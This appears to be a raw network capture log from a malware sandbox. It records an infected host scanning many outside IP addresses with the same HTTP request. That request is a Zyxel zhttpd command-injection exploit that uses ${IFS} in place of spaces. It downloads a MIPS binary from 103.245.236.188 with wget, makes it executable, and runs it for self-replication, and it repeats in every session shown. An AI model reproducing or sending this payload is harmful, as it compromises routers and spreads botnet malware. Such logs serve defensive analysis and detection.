                                                Jan 12, 2024 18:16:28.578130007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5702192.168.2.2357284100.9.5.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578181028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5703192.168.2.2339470142.151.212.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578255892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5704192.168.2.2358698112.36.236.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578325033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5705192.168.2.235103290.105.209.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578375101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5706192.168.2.235525419.20.243.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578444958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5707192.168.2.2334760196.80.64.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578519106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5708192.168.2.2333176156.141.146.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578587055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5709192.168.2.2340884217.212.104.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578633070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5710192.168.2.2348634154.37.238.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578670979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5711192.168.2.2356260186.221.70.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578717947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5712192.168.2.2356108151.240.246.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578738928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5713192.168.2.235092079.175.180.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578767061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5714192.168.2.2360926133.36.182.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578824997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5715192.168.2.2359434149.53.57.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578867912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5716192.168.2.2336984110.26.213.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578912020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5717192.168.2.234316095.191.188.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578948975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5718192.168.2.234384224.18.103.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578979015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5719192.168.2.2349038194.248.216.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579040051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5720192.168.2.234220846.237.202.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579080105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5721192.168.2.2353702138.142.148.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579112053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5722192.168.2.2338606123.143.73.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579133034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5723192.168.2.235477268.35.54.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579201937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5724192.168.2.2334626221.174.76.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579236031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5725192.168.2.235925451.244.58.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579282045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5726192.168.2.2345394173.193.128.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579325914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5727192.168.2.2339190207.216.145.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579365015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5728192.168.2.235532465.245.202.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579395056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5729192.168.2.2349064212.115.245.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579441071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5730192.168.2.233906684.161.86.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579476118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5731192.168.2.234422897.238.27.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579535007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5732192.168.2.2354942200.139.65.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579564095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5733192.168.2.2352320167.28.67.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579602003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5734192.168.2.2358268184.33.116.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579632998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5735192.168.2.2344900216.112.95.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579653978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5736192.168.2.235521434.44.211.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579695940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5737192.168.2.2360558144.197.222.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579722881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5738192.168.2.2339382126.146.90.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579752922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5739192.168.2.2342258114.91.21.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579801083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5740192.168.2.233385277.92.248.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579824924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5741192.168.2.2348754164.24.65.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579869032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5742192.168.2.2341316201.254.250.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579895020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5743192.168.2.234902275.161.211.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579947948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5744192.168.2.2334466177.14.13.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.579982996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5745192.168.2.2359448193.46.91.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580074072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5746192.168.2.236002493.128.155.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580190897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5747192.168.2.2350012103.243.16.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580296993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5748192.168.2.235192088.220.146.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580339909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5749192.168.2.2343086134.132.103.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580393076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5750192.168.2.235325658.63.220.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580451965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5751192.168.2.2337552197.193.199.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580499887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5752192.168.2.2351128188.166.102.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580552101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5753192.168.2.234142627.240.232.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580596924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5754192.168.2.2339708148.3.244.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580661058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5755192.168.2.2355202221.59.121.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580717087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5756192.168.2.2357038196.132.221.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580768108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5757192.168.2.2335696135.6.126.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580831051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5758192.168.2.235860623.247.179.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580888987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5759192.168.2.23480245.50.92.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580924988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5760192.168.2.2353458172.147.35.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.580969095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5761192.168.2.236024288.2.204.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581018925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5762192.168.2.2359422141.95.221.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581074953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5763192.168.2.2342204101.187.0.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.581135035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5764192.168.2.235814867.66.13.7443
                                                TimestampBytes transferredDirectionData
